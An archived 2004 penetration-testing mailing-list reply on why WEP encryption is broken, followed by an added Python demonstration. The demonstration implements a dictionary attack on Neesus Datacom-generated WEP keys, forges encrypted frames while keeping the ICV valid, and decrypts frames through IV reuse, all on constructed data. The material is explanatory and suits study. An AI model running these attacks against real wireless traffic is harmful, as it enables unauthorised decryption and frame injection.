Re: Wireless Scanning

From: Joshua Wright (jwright_at_hasborg.com)
Date: 09/28/04

  • Next message: robert_at_dyadsecurity.com: "Introducing Unicornscan"
    Date: Tue, 28 Sep 2004 16:01:50 -0400
    To: 'Pen-Test' <pen-test@securityfocus.com>
    
    

    Jason T wrote:
    > Just a comment on using WEP cracking programs. I heard from Keith
    > Parsons who is an expert wireless teacher saying that WEP cracking in
    > the wild today doesn't exist in most cases.

    I suspect Parsons said this based on empirical evidence due to the
    difficulty he perceives in recovering WEP keys. Since most attacks
    against WEP are passive or offline attacks, it's difficult to know if it
    is used frequently in practice. More below.

    > In early 2002 all vendors saw the weak IV as an attack. So they
    > changed the firmware to no longer support those weak IVs. If you
    > want to crack WEP it will most likely be on an AP that has a firmware
    > version prior to 2002.

    While it is true that tools like wep_attack and AirSnort rely on the now
    less-common IV values, more recent tools such as AirCrack and WEPlab are
    successful at recovering WEP keys even when common weak IVs are
    filtered. I've been successful at recovering WEP keys with as few as
    75,000 IVs with AirCrack.

    Moreover, there are other key-recovery attack methods as well, including
    dictionary attacks and attacks against the Neesus Datacom key generation
    algorithm. Not to mention many other attacks against WEP to inject
    frames or decrypt traffic without the knowledge of the WEP key (ICV
    invalidation, IV collision/known plaintext recovery, etc.)

    WEP is badly broken. Even when deployed in a dynamic keying environment
    with short key durations, it is susceptible to many different attacks.
    I recommend steering away from WEP-based encryption wherever security is
    a concern.

    -Josh

    -- 
    -Joshua Wright
    jwright@hasborg.com
    http://home.jwu.edu/jwright/
    pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
    fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73
    Today I stumbled across the world's largest hotspot.  The SSID is "linksys".
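
    The following is an added example, not part of Josh's post and not code
    from AirCrack, WEPlab or any other tool he names. It models three of the
    attacks his message lists that do not depend on weak IVs at all: a
    dictionary attack through the Neesus Datacom passphrase-to-key generator
    (with its effective 21-bit seed space), keystream recovery from an IV
    collision with known plaintext, and rewriting an encrypted frame while
    keeping the ICV valid (the CRC-32 linearity attack from Borisov, Goldberg
    and Wagner's 2001 paper). The generator's LCG constants and byte layout are
    the commonly documented ones from Tim Newsham's 2001 analysis; the
    passphrase, wordlist, IV and frame contents are constructed here, and the
    frame model keeps only the IV, the RC4-encrypted body and the ICV.

```python
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA); WEP keys it with IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Simplified WEP body: cleartext 3-byte IV, then RC4(IV||key) over
    plaintext || ICV. A real frame also carries 802.11 headers and a key id."""
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes):
    """Plaintext if the ICV verifies under this key, else None."""
    pt = rc4(frame[:3] + key, frame[3:])
    return pt[:-4] if icv(pt[:-4]) == pt[-4:] else None


def keys_from_seed(seed: int) -> list:
    """Four 40-bit keys from a 32-bit seed with the LCG the Neesus Datacom
    generator is documented to use (MSVC rand() constants, output = bits 16..23)."""
    keys = []
    for _ in range(4):
        k = bytearray()
        for _ in range(5):
            seed = (seed * 0x343FD + 0x269EC3) & 0xFFFFFFFF
            k.append((seed >> 16) & 0xFF)
        keys.append(bytes(k))
    return keys


def neesus_keys(passphrase: str) -> list:
    """Passphrase -> seed by XORing byte i into seed byte (i mod 4). ASCII keeps
    bits 7/15/23/31 clear, and seed bits 24..31 never influence the output byte
    (carries only propagate upward), so only 21 seed bits matter: 2^21 keys."""
    seed = 0
    for i, ch in enumerate(passphrase.encode("ascii")):
        seed ^= ch << (8 * (i % 4))
    return keys_from_seed(seed)


def dictionary_attack(frame: bytes, wordlist):
    """Try each word's four generated keys; a verifying ICV identifies the key."""
    for word in wordlist:
        for key in neesus_keys(word):
            if wep_decrypt(key, frame) is not None:
                return word, key
    return None


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Alter an encrypted frame without the key. RC4 is a stream cipher, so
    XORing delta into the ciphertext XORs it into the plaintext; CRC-32 is
    affine, so crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros), which fixes the ICV."""
    n = len(frame) - 3 - 4
    d = delta.ljust(n, b"\x00")
    fix = (zlib.crc32(d) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    return frame[:3] + xor(frame[3:], d + fix)


def keystream_reuse(frame_known: bytes, known_pt: bytes, frame_other: bytes) -> bytes:
    """Two frames under one IV share a keystream; a known plaintext (an ARP or
    DHCP frame in practice) yields it and decrypts the other frame with no key.
    Returns the prefix of the other frame that the recovered keystream covers."""
    if frame_known[:3] != frame_other[:3]:
        raise ValueError("frames do not share an IV")
    ks = xor(frame_known[3:], known_pt + icv(known_pt))
    return xor(frame_other[3:], ks)[:-4]


if __name__ == "__main__":
    # Constructed demo data: nothing here is a captured key or frame.
    key = neesus_keys("wireless")[0]
    iv = b"\x01\x02\x03"
    frame = wep_encrypt(key, iv, b"GET / HTTP/1.0\r\n")
    print("dictionary:", dictionary_attack(frame, ["linksys", "default", "wireless"]))
    forged = flip_bits(frame, b"\x00" * 4 + bytes([ord("/") ^ ord("x")]))
    print("forged frame still verifies:", wep_decrypt(key, forged))
    other = wep_encrypt(key, iv, b"secret")
    print("via IV reuse:", keystream_reuse(frame, b"GET / HTTP/1.0\r\n", other))
```

    In practice the candidate keys are checked against captured frames the
    same way wep_decrypt does here, and because keys_from_seed ignores the top
    seed byte, walking all 2^21 reachable seeds is feasible even when no word
    list hits. The last two functions need no key at all, which is Josh's
    point: filtering weak IVs does nothing against them.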
    
